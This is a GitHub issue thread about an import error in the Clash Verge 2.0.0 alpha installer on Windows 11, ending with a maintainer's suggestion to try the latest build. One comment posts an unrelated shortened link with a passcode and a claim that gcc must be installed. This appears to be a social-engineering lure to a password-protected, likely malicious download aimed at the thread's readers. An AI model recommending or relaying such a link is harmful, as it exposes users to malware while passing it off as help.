### ISSUE TITLE
[BUG] 2.0.0版本导入订阅报错：failed to create file "xxxx.yaml"

### ISSUE THREAD

**Issue by Ryaningli** [clash-verge-rev/clash-verge-rev#1683]
### 问题描述 / Describe the bug

[Clash.Verge_2.0.0_x64-setup.exe](https://github.com/clash-verge-rev/clash-verge-rev/releases/download/alpha/Clash.Verge_2.0.0_x64-setup.exe)

安装后，导入订阅链接会弹窗报错：failed to create file "xxxx.yaml"

### 复现步骤 / To Reproduce

如上描述

### 操作系统 / OS

Windows

### 操作系统版本 / OS Version

Windows 11

### 日志 / Log

如上描述

**Comment by brunoR1000** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by Ryaningli** [comment]
> You must have gcc compiler installed

请问这是什么

**Comment by wonfen** [comment]
请测试今天最新的版本
